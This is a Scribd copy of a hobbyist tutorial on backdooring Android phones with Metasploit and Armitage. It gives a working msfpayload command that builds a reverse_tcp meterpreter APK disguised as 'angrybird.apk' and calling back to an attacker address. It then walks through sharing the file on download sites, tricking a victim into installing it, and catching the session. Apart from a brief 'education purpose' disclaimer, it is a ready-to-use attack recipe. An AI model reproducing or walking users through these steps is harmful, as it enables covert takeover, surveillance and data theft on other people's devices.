100% found this document useful (1 vote)
4K views

How To Hack Your Android Using Armitage

This document provides instructions for hacking an Android device using Armitage. It outlines generating a reverse_tcp meterpreter payload with msfpayload, sending the backdoor APK file to the target device, and using Armitage to launch a listener on the same port. Once the target installs the backdoor APK, a meterpreter session will open, giving the attacker control of the device. The goal is educational to demonstrate social engineering techniques.

Uploaded by

Fery Ardiansyah
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
4K views

How To Hack Your Android Using Armitage

This document provides instructions for hacking an Android device using Armitage. It outlines generating a reverse_tcp meterpreter payload with msfpayload, sending the backdoor APK file to the target device, and using Armitage to launch a listener on the same port. Once the target installs the backdoor APK, a meterpreter session will open, giving the attacker control of the device. The goal is educational to demonstrate social engineering techniques.

Uploaded by

Fery Ardiansyah
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

how to hack your android

using armitage

Hello, thanks for give me


support to like my facebook fan page at here, now i want to share, how to Hack your
Android device using Armitage? you know Armitage is Metasploit Version Graphic User
Interface or GUI, ok lets rock :D what we need??
msfpayload to create backdoor
Armitage
Kali Linux or another Pentest Distro
Social Engineering :p
the first you need to create backdoor.apk bro, open terminal and put
this code

kali :~# msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=81 R > angrybird.apk

NOTE : 192.168.1.3 is my IP as Attacker, 81 is port listener and angrybird.apk is the


backdoor name, whatever, use your mind to give the backdoor name
What next? you just need to send the backdoor on your Android
Target bro, you can upload on 4shared or Cloud computing like a dropbox
Open the armitage, look at this image

After the Armitage is opened, you just to click Payload > Android
> Meterpreter > reverse_tcp

Next, please insert your IP and Port to listening the


meterpreter, remember The PORT must be same with your backdoor in the
first step, Click Launch

Listener is ready to get meterpreter, just need the Victim install my


angrybird.apk hahaha

Android Device have installed my backdoor so Meterpreter session 1


opened :D

Up to you, what do you want to do, but this tutorial just for
education purpose

Dedicated to http://www.indonesianbacktrack.or.id | BlackNewbieTeam | idblackhat |


my love Nabila

You might also like